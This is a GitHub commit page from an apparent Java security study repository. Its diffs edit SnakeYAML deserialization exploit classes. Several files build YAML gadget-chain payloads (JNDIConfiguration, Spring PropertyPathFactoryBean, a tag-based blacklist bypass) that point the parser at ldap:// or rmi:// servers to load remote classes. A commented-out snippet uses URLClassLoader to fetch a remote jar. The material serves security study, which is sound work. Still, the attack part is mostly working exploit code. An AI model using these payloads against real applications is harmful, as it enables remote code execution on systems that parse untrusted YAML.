Skip to content

Commit 7bf8f49

Browse files
Drun1babyDrun1baby
committed
pr
1 parent a0596c9 commit 7bf8f49

22 files changed

Lines changed: 37 additions & 26 deletions

.DS_Store

0 Bytes
Binary file not shown.

JavaSecurity/.DS_Store

2 KB
Binary file not shown.

JavaSecurity/SnakeYaml/src/main/java/AvailableGadgets/JndiConfigurationEXP.java

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -8,7 +8,7 @@ public static void main(String[] args) {
88
String payload = "!!org.apache.commons.configuration.ConfigurationMap " +
99
"[!!org.apache.commons.configuration.JNDIConfiguration " +
1010
"[!!javax.naming.InitialContext [], " +
11-
"\"rmi://127.0.0.1:1099/Exploit\"]]: 1";
11+
"\"rmi://127.0.0.1:1099/nprcsj\"]]: 1";
1212
Yaml yaml = new Yaml();
1313
yaml.load(payload);
1414
}

JavaSecurity/SnakeYaml/src/main/java/AvailableGadgets/SpringPropertyPathFactoryBeanEXP.java

Lines changed: 5 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -6,18 +6,18 @@
66
public class SpringPropertyPathFactoryBeanEXP {
77
public static void main(String[] args) {
88
String payload = "!!org.springframework.beans.factory.config.PropertyPathFactoryBean\n" +
9-
" targetBeanName: \"ldap://localhost:1389/Exploit\"\n" +
9+
" targetBeanName: \"ldap://localhost:1389/aprvde\"\n" +
1010
" propertyPath: Drunkbaby\n" +
1111
" beanFactory: !!org.springframework.jndi.support.SimpleJndiBeanFactory\n" +
12-
" shareableResources: [\"ldap://localhost:1389/Exploit\"]";
12+
" shareableResources: [\"ldap://localhost:1389/aprvde\"]";
1313

1414
String poc = "!!org.springframework.beans.factory.config.PropertyPathFactoryBean\n" +
15-
" targetBeanName: \"rmi://127.0.0.1:1099/Exploit\"\n" +
15+
" targetBeanName: \"rmi://127.0.0.1:1099/nprcsj\"\n" +
1616
" propertyPath: Drunkbaby\n" +
1717
" beanFactory: !!org.springframework.jndi.support.SimpleJndiBeanFactory\n" +
18-
" shareableResources: [\"rmi://127.0.0.1:1099/Exploit\"]";
18+
" shareableResources: [\"rmi://127.0.0.1:1099/nprcsj\"]";
1919

2020
Yaml yaml = new Yaml();
21-
yaml.load(poc);
21+
yaml.load(payload);
2222
}
2323
}

JavaSecurity/SnakeYaml/src/main/java/BypassAnalyze/bypassBlackList.java

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -30,10 +30,10 @@ public String yamlLoads(String payload) {
3030

3131
public static void main(String[] args) {
3232
String payload = "!<tag:yaml.org,2002:org.springframework.beans.factory.config.PropertyPathFactoryBean> \n" +
33-
" targetBeanName: \"ldap://localhost:1389/Exploit\"\n" +
33+
" targetBeanName: \"ldap://127.0.0.1:1389/aprvde\"\n" +
3434
" propertyPath: Drunkbaby\n" +
3535
" beanFactory: !<tag:yaml.org,2002:org.springframework.jndi.support.SimpleJndiBeanFactory> \n" +
36-
" shareableResources: [\"ldap://localhost:1389/Exploit\"]";
36+
" shareableResources: [\"ldap://127.0.0.1:1389/aprvde\"]";
3737
bypassTest bypassTest = new bypassTest();
3838
bypassTest.yamlLoads(payload);
3939
}

JavaSecurity/SnakeYaml/src/main/java/SnakeYamlFix/SnakeYamlFix.java

Lines changed: 18 additions & 18 deletions
Original file line numberDiff line numberDiff line change
@@ -1,18 +1,18 @@
1-
package SnakeYamlFix;
2-
3-
import org.yaml.snakeyaml.Yaml;
4-
import org.yaml.snakeyaml.constructor.SafeConstructor;
5-
6-
public class SnakeYamlFix {
7-
public static void main(String[] args) {
8-
9-
String context = "!!javax.script.ScriptEngineManager [\n" +
10-
" !!java.net.URLClassLoader [[\n" +
11-
" !!java.net.URL [\"http://127.0.0.1:7777/yaml-payload-master.jar\"]\n" +
12-
" ]]\n" +
13-
"]";
14-
Yaml yaml = new Yaml(new SafeConstructor());
15-
yaml.load(context);
16-
}
17-
18-
}
1+
//package SnakeYamlFix;
2+
//
3+
//import org.yaml.snakeyaml.Yaml;
4+
//import org.yaml.snakeyaml.constructor.SafeConstructor;
5+
//
6+
//public class SnakeYamlFix {
7+
// public static void main(String[] args) {
8+
//
9+
// String context = "!!javax.script.ScriptEngineManager [\n" +
10+
// " !!java.net.URLClassLoader [[\n" +
11+
// " !!java.net.URL [\"http://127.0.0.1:7777/yaml-payload-master.jar\"]\n" +
12+
// " ]]\n" +
13+
// "]";
14+
// Yaml yaml = new Yaml(new SafeConstructor());
15+
// yaml.load(context);
16+
// }
17+
//
18+
//}

JavaSecurity/SnakeYaml/target/classes/AvailableGadgets/C3P0JndiRefForwardingDataSourceEXP.class

0 Bytes
Binary file not shown.

JavaSecurity/SnakeYaml/target/classes/AvailableGadgets/HexBaseEXP.class

0 Bytes
Binary file not shown.

JavaSecurity/SnakeYaml/target/classes/AvailableGadgets/JdbcRowSetImplEXP.class

0 Bytes
Binary file not shown.

JavaSecurity/SnakeYaml/target/classes/AvailableGadgets/JndiConfigurationEXP.class

-1 Bytes
Binary file not shown.

0 commit comments

Comments
 (0)